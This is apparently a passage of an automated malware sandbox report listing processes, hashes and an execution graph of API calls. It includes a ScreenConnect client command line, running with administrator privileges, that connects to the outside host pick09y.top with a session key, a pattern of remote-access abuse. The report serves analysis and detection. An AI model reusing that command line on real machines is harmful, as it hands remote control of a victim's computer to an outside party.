                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1"
                                                                                                                                                                              Imagebase:0x80000
                                                                                                                                                                              File size:95'520 bytes
                                                                                                                                                                              MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:9
                                                                                                                                                                              Start time:12:04:55
                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                              Imagebase:0x7ff7e52b0000
                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:10
                                                                                                                                                                              Start time:12:04:55
                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe" "RunRole" "7c199985-91b6-43e6-a992-7121e466b299" "User"
                                                                                                                                                                              Imagebase:0x20000
                                                                                                                                                                              File size:601'376 bytes
                                                                                                                                                                              MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:11
                                                                                                                                                                              Start time:12:04:55
                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5856 -ip 5856
                                                                                                                                                                              Imagebase:0xe40000
                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:12
                                                                                                                                                                              Start time:12:04:55
                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 316
                                                                                                                                                                              Imagebase:0xe40000
                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:13
                                                                                                                                                                              Start time:12:04:57
                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                              Imagebase:0x7ff7e52b0000
                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:14
                                                                                                                                                                              Start time:12:04:57
                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe" "RunRole" "7595e846-2dc4-4314-8d6a-fc819222a16f" "System"
                                                                                                                                                                              Imagebase:0x190000
                                                                                                                                                                              File size:601'376 bytes
                                                                                                                                                                              MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Reset < >

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:2.2%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                Signature Coverage:3.8%
                                                                                                                                                                                Total number of Nodes:1465
                                                                                                                                                                                Total number of Limit Nodes:4
                                                                                                                                                                                execution_graph 5969 f53eb5 5970 f53eb8 5969->5970 5971 f53f24 _abort 33 API calls 5970->5971 5972 f53ec4 5971->5972 5748 f51ff4 5751 f52042 5748->5751 5752 f51fff 5751->5752 5753 f5204b 5751->5753 5753->5752 5760 f523c3 5753->5760 5756 f523c3 43 API calls 5757 f52091 5756->5757 5774 f53e89 5757->5774 5780 f523d1 5760->5780 5762 f523c8 5763 f52086 5762->5763 5764 f56b14 _abort 2 API calls 5762->5764 5763->5756 5765 f53f29 5764->5765 5766 f53f35 5765->5766 5767 f56b6f _abort 33 API calls 5765->5767 5768 f53f5c 5766->5768 5769 f53f3e IsProcessorFeaturePresent 5766->5769 5767->5766 5771 f53793 _abort 23 API calls 5768->5771 5770 f53f49 5769->5770 5772 f54573 _abort 3 API calls 5770->5772 5773 f53f66 5771->5773 5772->5768 5775 f53e95 _abort 5774->5775 5776 f54424 _abort 33 API calls 5775->5776 5779 f53e9a 5776->5779 5777 f53f24 _abort 33 API calls 5778 f53ec4 5777->5778 5779->5777 5781 f523dd GetLastError 5780->5781 5782 f523da 5780->5782 5792 f526a4 5781->5792 5782->5762 5785 f52457 SetLastError 5785->5762 5786 f526df ___vcrt_FlsSetValue 6 API calls 5787 f5240b 5786->5787 5788 f52433 5787->5788 5789 f526df ___vcrt_FlsSetValue 6 API calls 5787->5789 5791 f52411 5787->5791 5790 f526df ___vcrt_FlsSetValue 6 API calls 5788->5790 5788->5791 5789->5788 5790->5791 5791->5785 5793 f52543 ___vcrt_FlsSetValue 5 API calls 5792->5793 5794 f526be 5793->5794 5795 f526d6 TlsGetValue 5794->5795 5796 f523f2 5794->5796 5795->5796 5796->5785 5796->5786 5796->5791 5797 f58df1 5798 f58e15 5797->5798 5799 f58e2e 5798->5799 5801 f59beb __startOneArgErrorHandling 5798->5801 5800 f58e78 5799->5800 5805 f599d3 5799->5805 5804 f59c2d __startOneArgErrorHandling 5801->5804 5813 f5a1c4 5801->5813 5806 f59a00 5805->5806 5807 f599f0 DecodePointer 5805->5807 5808 f59a82 _ValidateLocalCookies 5806->5808 5809 f59a8d 5806->5809 5811 f59a37 5806->5811 5807->5806 5808->5800 5809->5808 5810 f547f9 _free 15 API calls 5809->5810 5810->5808 5811->5808 5812 f547f9 _free 15 API calls 5811->5812 5812->5808 5814 f5a1fd __startOneArgErrorHandling 5813->5814 5816 f5a224 __startOneArgErrorHandling 5814->5816 5822 f5a495 5814->5822 5817 f5a267 5816->5817 5819 f5a242 5816->5819 5833 f5a786 5817->5833 5826 f5a7b5 5819->5826 5821 f5a262 __startOneArgErrorHandling _ValidateLocalCookies 5821->5804 5823 f5a4c0 __raise_exc 5822->5823 5824 f5a6b9 RaiseException 5823->5824 5825 f5a6d1 5824->5825 5825->5816 5827 f5a7c4 5826->5827 5828 f5a7e3 __startOneArgErrorHandling 5827->5828 5829 f5a838 __startOneArgErrorHandling 5827->5829 5831 f5a786 __startOneArgErrorHandling 15 API calls 5828->5831 5832 f5a831 5828->5832 5830 f5a786 __startOneArgErrorHandling 15 API calls 5829->5830 5830->5832 5831->5832 5832->5821 5834 f5a793 5833->5834 5835 f5a7a8 5833->5835 5837 f547f9 _free 15 API calls 5834->5837 5838 f5a7ad 5834->5838 5836 f547f9 _free 15 API calls 5835->5836 5836->5838 5839 f5a7a0 5837->5839 5838->5821 5839->5821 6126 f57570 6127 f575a9 6126->6127 6128 f547f9 _free 15 API calls 6127->6128 6132 f575d5 _ValidateLocalCookies 6127->6132 6129 f575b2 6128->6129 6130 f5473d _abort 21 API calls 6129->6130 6131 f575bd _ValidateLocalCookies 6130->6131 6347 f5383f 6349 f5384b ___scrt_is_nonwritable_in_current_image 6347->6349 6348 f53882 _abort 6349->6348 6355 f556e2 EnterCriticalSection 6349->6355 6351 f5385f 6352 f567cb __fassign 15 API calls 6351->6352 6353 f5386f 6352->6353 6356 f53888 6353->6356 6355->6351 6359 f5572a LeaveCriticalSection 6356->6359 6358 f5388f 6358->6348 6359->6358 5973 f51ab8 5974 f51aef 5973->5974 5975 f51aca 5973->5975 5975->5974 5982 f5209a 5975->5982 5980 f53e89 33 API calls 5981 f51b0d 5980->5981 5983 f523c3 43 API calls 5982->5983 5984 f51afc 5983->5984 5985 f520a3 5984->5985 5986 f523c3 43 API calls 5985->5986 5987 f51b06 5986->5987 5987->5980 5840 f512fb 5845 f51aac SetUnhandledExceptionFilter 5840->5845 5842 f51300 5846 f538f9 5842->5846 5844 f5130b 5845->5842 5847 f53905 5846->5847 5848 f5391f 5846->5848 5847->5848 5849 f547f9 _free 15 API calls 5847->5849 5848->5844 5850 f5390f 5849->5850 5851 f5473d _abort 21 API calls 5850->5851 5852 f5391a 5851->5852 5852->5844 5988 f548bb 5989 f548cb 5988->5989 5998 f548e1 5988->5998 5990 f547f9 _free 15 API calls 5989->5990 5991 f548d0 5990->5991 5992 f5473d _abort 21 API calls 5991->5992 6003 f548da 5992->6003 5993 f5494b 6018 f531ec 5993->6018 5995 f549b0 5997 f549b9 5995->5997 6004 f54a3e 5995->6004 6024 f579bb 5995->6024 5999 f54869 _free 15 API calls 5997->5999 5998->5993 6000 f54a2c 5998->6000 6007 f54a4b 5998->6007 5999->6000 6033 f54c65 6000->6033 6005 f5474d _abort 6 API calls 6004->6005 6006 f54a4a 6005->6006 6008 f54a57 6007->6008 6008->6008 6009 f5480c _abort 15 API calls 6008->6009 6010 f54a85 6009->6010 6011 f579bb 21 API calls 6010->6011 6012 f54ab1 6011->6012 6013 f5474d _abort 6 API calls 6012->6013 6014 f54ae0 _abort 6013->6014 6015 f54b81 FindFirstFileExA 6014->6015 6016 f54bd0 6015->6016 6017 f54a4b 21 API calls 6016->6017 6019 f531fd 6018->6019 6020 f53201 6018->6020 6019->5995 6020->6019 6021 f5480c _abort 15 API calls 6020->6021 6022 f5322f 6021->6022 6023 f54869 _free 15 API calls 6022->6023 6023->6019 6028 f5790a 6024->6028 6025 f5791f 6026 f547f9 _free 15 API calls 6025->6026 6027 f57924 6025->6027 6029 f5794a 6026->6029 6027->5995 6028->6025 6028->6027 6031 f5795b 6028->6031 6030 f5473d _abort 21 API calls 6029->6030 6030->6027 6031->6027 6032 f547f9 _free 15 API calls 6031->6032 6032->6029 6034 f54c6f 6033->6034 6035 f54c7f 6034->6035 6037 f54869 _free 15 API calls 6034->6037 6036 f54869 _free 15 API calls 6035->6036 6038 f54c86 6036->6038 6037->6034 6038->6003 6039 f514bb IsProcessorFeaturePresent 6040 f514d0 6039->6040 6043 f51493 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6040->6043 6042 f515b3 6043->6042 5853 f533e5 5854 f533f7 5853->5854 5855 f533fd 5853->5855 5857 f53376 5854->5857 5858 f53383 5857->5858 5859 f533a0 5857->5859 5860 f5339a 5858->5860 5861 f54869 _free 15 API calls 5858->5861 5859->5855 5862 f54869 _free 15 API calls 5860->5862 5861->5858 5862->5859 6044 f55ba6 6045 f55bd7 6044->6045 6047 f55bb1 6044->6047 6046 f55bc1 FreeLibrary 6046->6047 6047->6045 6047->6046 6360 f56026 6361 f5602b 6360->6361 6363 f5604e 6361->6363 6364 f55c56 6361->6364 6365 f55c63 6364->6365 6366 f55c85 6364->6366 6367 f55c71 DeleteCriticalSection 6365->6367 6368 f55c7f 6365->6368 6366->6361 6367->6367 6367->6368 6369 f54869 _free 15 API calls 6368->6369 6369->6366 5863 f58ce1 5864 f58d01 5863->5864 5867 f58d38 5864->5867 5866 f58d2b 5868 f58d3f 5867->5868 5869 f58da0 5868->5869 5870 f58d5f 5868->5870 5872 f5988e 5869->5872 5876 f59997 5869->5876 5870->5872 5874 f59997 16 API calls 5870->5874 5872->5866 5875 f598be 5874->5875 5875->5866 5877 f599a0 5876->5877 5880 f5a06f 5877->5880 5879 f58dee 5879->5866 5881 f5a0ae __startOneArgErrorHandling 5880->5881 5884 f5a130 __startOneArgErrorHandling 5881->5884 5886 f5a472 5881->5886 5883 f5a786 __startOneArgErrorHandling 15 API calls 5885 f5a166 _ValidateLocalCookies 5883->5885 5884->5883 5884->5885 5885->5879 5887 f5a495 __raise_exc RaiseException 5886->5887 5888 f5a490 5887->5888 5888->5884 6048 f556a1 6049 f556ac 6048->6049 6050 f559b3 6 API calls 6049->6050 6051 f556d5 6049->6051 6053 f556d1 6049->6053 6050->6049 6054 f556f9 6051->6054 6055 f55725 6054->6055 6056 f55706 6054->6056 6055->6053 6057 f55710 DeleteCriticalSection 6056->6057 6057->6055 6057->6057 6133 f59160 6136 f5917e 6133->6136 6135 f59176 6137 f59183 6136->6137 6138 f59218 6137->6138 6139 f599d3 16 API calls 6137->6139 6138->6135 6140 f593af 6139->6140 6140->6135 6370 f5452d 6378 f55858 6370->6378 6372 f54537 6373 f544a8 _free 15 API calls 6372->6373 6377 f54541 6372->6377 6374 f54549 6373->6374 6375 f54556 6374->6375 6383 f54559 6374->6383 6379 f55741 _abort 5 API calls 6378->6379 6380 f5587f 6379->6380 6381 f55897 TlsAlloc 6380->6381 6382 f55888 _ValidateLocalCookies 6380->6382 6381->6382 6382->6372 6384 f54563 6383->6384 6386 f54569 6383->6386 6387 f558ae 6384->6387 6386->6377 6388 f55741 _abort 5 API calls 6387->6388 6389 f558d5 6388->6389 6390 f558ed TlsFree 6389->6390 6391 f558e1 _ValidateLocalCookies 6389->6391 6390->6391 6391->6386 6392 f5142e 6395 f52cf0 6392->6395 6394 f5143f 6396 f544a8 _free 15 API calls 6395->6396 6397 f52d07 _ValidateLocalCookies 6396->6397 6397->6394 5889 f59beb 5890 f59c04 __startOneArgErrorHandling 5889->5890 5891 f5a1c4 16 API calls 5890->5891 5892 f59c2d __startOneArgErrorHandling 5890->5892 5891->5892 6141 f57351 6142 f5735e 6141->6142 6143 f5480c _abort 15 API calls 6142->6143 6144 f57378 6143->6144 6145 f54869 _free 15 API calls 6144->6145 6146 f57384 6145->6146 6147 f5480c _abort 15 API calls 6146->6147 6151 f573aa 6146->6151 6149 f5739e 6147->6149 6148 f559b3 6 API calls 6148->6151 6150 f54869 _free 15 API calls 6149->6150 6150->6151 6151->6148 6152 f573b6 6151->6152 5893 f55fd0 5894 f55fdc ___scrt_is_nonwritable_in_current_image 5893->5894 5905 f556e2 EnterCriticalSection 5894->5905 5896 f55fe3 5906 f55c8b 5896->5906 5898 f55ff2 5899 f56001 5898->5899 5919 f55e64 GetStartupInfoW 5898->5919 5930 f5601d 5899->5930 5902 f56012 _abort 5905->5896 5907 f55c97 ___scrt_is_nonwritable_in_current_image 5906->5907 5908 f55ca4 5907->5908 5909 f55cbb 5907->5909 5910 f547f9 _free 15 API calls 5908->5910 5933 f556e2 EnterCriticalSection 5909->5933 5912 f55ca9 5910->5912 5913 f5473d _abort 21 API calls 5912->5913 5914 f55cb3 _abort 5913->5914 5914->5898 5916 f55cc7 5918 f55cf3 5916->5918 5934 f55bdc 5916->5934 5941 f55d1a 5918->5941 5920 f55f13 5919->5920 5921 f55e81 5919->5921 5925 f55f1a 5920->5925 5921->5920 5922 f55c8b 22 API calls 5921->5922 5923 f55eaa 5922->5923 5923->5920 5924 f55ed8 GetFileType 5923->5924 5924->5923 5927 f55f21 5925->5927 5926 f55f64 GetStdHandle 5926->5927 5927->5926 5928 f55fcc 5927->5928 5929 f55f77 GetFileType 5927->5929 5928->5899 5929->5927 5950 f5572a LeaveCriticalSection 5930->5950 5932 f56024 5932->5902 5933->5916 5935 f5480c _abort 15 API calls 5934->5935 5938 f55bee 5935->5938 5936 f55bfb 5937 f54869 _free 15 API calls 5936->5937 5939 f55c4d 5937->5939 5938->5936 5944 f559b3 5938->5944 5939->5916 5949 f5572a LeaveCriticalSection 5941->5949 5943 f55d21 5943->5914 5945 f55741 _abort 5 API calls 5944->5945 5946 f559da 5945->5946 5947 f559f8 InitializeCriticalSectionAndSpinCount 5946->5947 5948 f559e3 _ValidateLocalCookies 5946->5948 5947->5948 5948->5938 5949->5943 5950->5932 6398 f57a10 6401 f57a27 6398->6401 6402 f57a35 6401->6402 6403 f57a49 6401->6403 6406 f547f9 _free 15 API calls 6402->6406 6404 f57a51 6403->6404 6405 f57a63 6403->6405 6407 f547f9 _free 15 API calls 6404->6407 6410 f53f72 __fassign 33 API calls 6405->6410 6412 f57a22 6405->6412 6408 f57a3a 6406->6408 6409 f57a56 6407->6409 6411 f5473d _abort 21 API calls 6408->6411 6413 f5473d _abort 21 API calls 6409->6413 6410->6412 6411->6412 6413->6412 6058 f56893 GetProcessHeap 6153 f52f53 6154 f52f62 6153->6154 6155 f52f7e 6153->6155 6154->6155 6157 f52f68 6154->6157 6156 f5522b 46 API calls 6155->6156 6158 f52f85 GetModuleFileNameA 6156->6158 6159 f547f9 _free 15 API calls 6157->6159 6160 f52fa9 6158->6160 6161 f52f6d 6159->6161 6176 f53077 6160->6176 6162 f5473d _abort 21 API calls 6161->6162 6163 f52f77 6162->6163 6166 f531ec 15 API calls 6167 f52fd3 6166->6167 6168 f52fdc 6167->6168 6169 f52fe8 6167->6169 6170 f547f9 _free 15 API calls 6168->6170 6171 f53077 33 API calls 6169->6171 6175 f52fe1 6170->6175 6172 f52ffe 6171->6172 6174 f54869 _free 15 API calls 6172->6174 6172->6175 6173 f54869 _free 15 API calls 6173->6163 6174->6175 6175->6173 6178 f5309c 6176->6178 6177 f555b6 33 API calls 6177->6178 6178->6177 6180 f530fc 6178->6180 6179 f52fc6 6179->6166 6180->6179 6181 f555b6 33 API calls 6180->6181 6181->6180 6182 f5365d 6183 f53e89 33 API calls 6182->6183 6184 f53665 6183->6184 6414 f57d1c 6415 f5522b 46 API calls 6414->6415 6416 f57d21 6415->6416 6417 f57419 6427 f57fb2 6417->6427 6421 f57426 6440 f5828e 6421->6440 6424 f57450 6425 f54869 _free 15 API calls 6424->6425 6426 f5745b 6425->6426 6444 f57fbb 6427->6444 6429 f57421 6430 f581ee 6429->6430 6431 f581fa ___scrt_is_nonwritable_in_current_image 6430->6431 6464 f556e2 EnterCriticalSection 6431->6464 6433 f58270 6478 f58285 6433->6478 6434 f58205 6434->6433 6436 f58244 DeleteCriticalSection 6434->6436 6465 f5901c 6434->6465 6439 f54869 _free 15 API calls 6436->6439 6437 f5827c _abort 6437->6421 6439->6434 6441 f582a4 6440->6441 6442 f57435 DeleteCriticalSection 6440->6442 6441->6442 6443 f54869 _free 15 API calls 6441->6443 6442->6421 6442->6424 6443->6442 6445 f57fc7 ___scrt_is_nonwritable_in_current_image 6444->6445 6454 f556e2 EnterCriticalSection 6445->6454 6447 f57fd6 6448 f5806a 6447->6448 6453 f57f6b 61 API calls 6447->6453 6455 f57465 EnterCriticalSection 6447->6455 6456 f58060 6447->6456 6459 f5808a 6448->6459 6451 f58076 _abort 6451->6429 6453->6447 6454->6447 6455->6447 6462 f57479 LeaveCriticalSection 6456->6462 6458 f58068 6458->6447 6463 f5572a LeaveCriticalSection 6459->6463 6461 f58091 6461->6451 6462->6458 6463->6461 6464->6434 6466 f59028 ___scrt_is_nonwritable_in_current_image 6465->6466 6467 f5904e 6466->6467 6468 f59039 6466->6468 6476 f59049 _abort 6467->6476 6481 f57465 EnterCriticalSection 6467->6481 6469 f547f9 _free 15 API calls 6468->6469 6471 f5903e 6469->6471 6473 f5473d _abort 21 API calls 6471->6473 6472 f5906a 6482 f58fa6 6472->6482 6473->6476 6475 f59075 6498 f59092 6475->6498 6476->6434 6736 f5572a LeaveCriticalSection 6478->6736 6480 f5828c 6480->6437 6481->6472 6483 f58fb3 6482->6483 6485 f58fc8 6482->6485 6484 f547f9 _free 15 API calls 6483->6484 6486 f58fb8 6484->6486 6490 f58fc3 6485->6490 6501 f57f05 6485->6501 6488 f5473d _abort 21 API calls 6486->6488 6488->6490 6490->6475 6491 f5828e 15 API calls 6492 f58fe4 6491->6492 6507 f5732b 6492->6507 6494 f58fea 6514 f59d4e 6494->6514 6497 f54869 _free 15 API calls 6497->6490 6735 f57479 LeaveCriticalSection 6498->6735 6500 f5909a 6500->6476 6502 f57f1d 6501->6502 6506 f57f19 6501->6506 6503 f5732b 21 API calls 6502->6503 6502->6506 6504 f57f3d 6503->6504 6529 f589a7 6504->6529 6506->6491 6508 f57337 6507->6508 6509 f5734c 6507->6509 6510 f547f9 _free 15 API calls 6508->6510 6509->6494 6511 f5733c 6510->6511 6512 f5473d _abort 21 API calls 6511->6512 6513 f57347 6512->6513 6513->6494 6515 f59d72 6514->6515 6516 f59d5d 6514->6516 6517 f59dad 6515->6517 6522 f59d99 6515->6522 6518 f547e6 __dosmaperr 15 API calls 6516->6518 6520 f547e6 __dosmaperr 15 API calls 6517->6520 6519 f59d62 6518->6519 6521 f547f9 _free 15 API calls 6519->6521 6523 f59db2 6520->6523 6526 f58ff0 6521->6526 6692 f59d26 6522->6692 6525 f547f9 _free 15 API calls 6523->6525 6527 f59dba 6525->6527 6526->6490 6526->6497 6528 f5473d _abort 21 API calls 6527->6528 6528->6526 6530 f589b3 ___scrt_is_nonwritable_in_current_image 6529->6530 6531 f589d3 6530->6531 6532 f589bb 6530->6532 6534 f58a71 6531->6534 6538 f58a08 6531->6538 6554 f547e6 6532->6554 6535 f547e6 __dosmaperr 15 API calls 6534->6535 6537 f58a76 6535->6537 6540 f547f9 _free 15 API calls 6537->6540 6557 f55d23 EnterCriticalSection 6538->6557 6539 f547f9 _free 15 API calls 6548 f589c8 _abort 6539->6548 6542 f58a7e 6540->6542 6544 f5473d _abort 21 API calls 6542->6544 6543 f58a0e 6545 f58a3f 6543->6545 6546 f58a2a 6543->6546 6544->6548 6558 f58a92 6545->6558 6547 f547f9 _free 15 API calls 6546->6547 6550 f58a2f 6547->6550 6548->6506 6552 f547e6 __dosmaperr 15 API calls 6550->6552 6551 f58a3a 6607 f58a69 6551->6607 6552->6551 6555 f544a8 _free 15 API calls 6554->6555 6556 f547eb 6555->6556 6556->6539 6557->6543 6559 f58ac0 6558->6559 6584 f58ab9 _ValidateLocalCookies 6558->6584 6560 f58ac4 6559->6560 6561 f58ae3 6559->6561 6562 f547e6 __dosmaperr 15 API calls 6560->6562 6564 f58b34 6561->6564 6565 f58b17 6561->6565 6563 f58ac9 6562->6563 6566 f547f9 _free 15 API calls 6563->6566 6567 f58b4a 6564->6567 6610 f58f8b 6564->6610 6568 f547e6 __dosmaperr 15 API calls 6565->6568 6570 f58ad0 6566->6570 6613 f58637 6567->6613 6569 f58b1c 6568->6569 6573 f547f9 _free 15 API calls 6569->6573 6574 f5473d _abort 21 API calls 6570->6574 6576 f58b24 6573->6576 6574->6584 6579 f5473d _abort 21 API calls 6576->6579 6577 f58b91 6580 f58ba5 6577->6580 6581 f58beb WriteFile 6577->6581 6578 f58b58 6582 f58b5c 6578->6582 6583 f58b7e 6578->6583 6579->6584 6587 f58bad 6580->6587 6588 f58bdb 6580->6588 6585 f58c0e GetLastError 6581->6585 6592 f58b74 6581->6592 6589 f58c52 6582->6589 6620 f585ca 6582->6620 6625 f58417 GetConsoleCP 6583->6625 6584->6551 6585->6592 6593 f58bb2 6587->6593 6594 f58bcb 6587->6594 6645 f586ad 6588->6645 6589->6584 6595 f547f9 _free 15 API calls 6589->6595 6592->6584 6592->6589 6598 f58c2e 6592->6598 6593->6589 6634 f5878c 6593->6634 6639 f5887a 6594->6639 6597 f58c77 6595->6597 6600 f547e6 __dosmaperr 15 API calls 6597->6600 6601 f58c35 6598->6601 6602 f58c49 6598->6602 6600->6584 6603 f547f9 _free 15 API calls 6601->6603 6650 f547c3 6602->6650 6605 f58c3a 6603->6605 6606 f547e6 __dosmaperr 15 API calls 6605->6606 6606->6584 6691 f55d46 LeaveCriticalSection 6607->6691 6609 f58a6f 6609->6548 6655 f58f0d 6610->6655 6677 f57eaf 6613->6677 6615 f58647 6616 f5864c 6615->6616 6617 f54424 _abort 33 API calls 6615->6617 6616->6577 6616->6578 6618 f5866f 6617->6618 6618->6616 6619 f5868d GetConsoleMode 6618->6619 6619->6616 6623 f58624 6620->6623 6624 f585ef 6620->6624 6621 f58626 GetLastError 6621->6623 6622 f59101 WriteConsoleW CreateFileW 6622->6624 6623->6592 6624->6621 6624->6622 6624->6623 6626 f5847a 6625->6626 6628 f5858c _ValidateLocalCookies 6625->6628 6626->6628 6629 f58500 WideCharToMultiByte 6626->6629 6630 f572b7 35 API calls __fassign 6626->6630 6633 f58557 WriteFile 6626->6633 6686 f56052 6626->6686 6628->6592 6629->6628 6631 f58526 WriteFile 6629->6631 6630->6626 6631->6626 6632 f585af GetLastError 6631->6632 6632->6628 6633->6626 6633->6632 6635 f5879b 6634->6635 6636 f58819 WriteFile 6635->6636 6638 f5885d _ValidateLocalCookies 6635->6638 6636->6635 6637 f5885f GetLastError 6636->6637 6637->6638 6638->6592 6644 f58889 6639->6644 6640 f58994 _ValidateLocalCookies 6640->6592 6641 f5890b WideCharToMultiByte 6642 f58940 WriteFile 6641->6642 6643 f5898c GetLastError 6641->6643 6642->6643 6642->6644 6643->6640 6644->6640 6644->6641 6644->6642 6648 f586bc 6645->6648 6646 f5872e WriteFile 6647 f58771 GetLastError 6646->6647 6646->6648 6649 f5876f _ValidateLocalCookies 6647->6649 6648->6646 6648->6649 6649->6592 6651 f547e6 __dosmaperr 15 API calls 6650->6651 6652 f547ce _free 6651->6652 6653 f547f9 _free 15 API calls 6652->6653 6654 f547e1 6653->6654 6654->6584 6664 f55dfa 6655->6664 6657 f58f1f 6658 f58f27 6657->6658 6659 f58f38 SetFilePointerEx 6657->6659 6660 f547f9 _free 15 API calls 6658->6660 6661 f58f50 GetLastError 6659->6661 6662 f58f2c 6659->6662 6660->6662 6663 f547c3 __dosmaperr 15 API calls 6661->6663 6662->6567 6663->6662 6665 f55e07 6664->6665 6666 f55e1c 6664->6666 6667 f547e6 __dosmaperr 15 API calls 6665->6667 6668 f547e6 __dosmaperr 15 API calls 6666->6668 6670 f55e41 6666->6670 6669 f55e0c 6667->6669 6671 f55e4c 6668->6671 6672 f547f9 _free 15 API calls 6669->6672 6670->6657 6673 f547f9 _free 15 API calls 6671->6673 6674 f55e14 6672->6674 6675 f55e54 6673->6675 6674->6657 6676 f5473d _abort 21 API calls 6675->6676 6676->6674 6678 f57ebc 6677->6678 6679 f57ec9 6677->6679 6680 f547f9 _free 15 API calls 6678->6680 6681 f57ed5 6679->6681 6682 f547f9 _free 15 API calls 6679->6682 6683 f57ec1 6680->6683 6681->6615 6684 f57ef6 6682->6684 6683->6615 6685 f5473d _abort 21 API calls 6684->6685 6685->6683 6687 f54424 _abort 33 API calls 6686->6687 6688 f5605d 6687->6688 6689 f572d1 __fassign 33 API calls 6688->6689 6690 f5606d 6689->6690 6690->6626 6691->6609 6695 f59ca4 6692->6695 6694 f59d4a 6694->6526 6696 f59cb0 ___scrt_is_nonwritable_in_current_image 6695->6696 6706 f55d23 EnterCriticalSection 6696->6706 6698 f59cbe 6699 f59ce5 6698->6699 6700 f59cf0 6698->6700 6707 f59dcd 6699->6707 6702 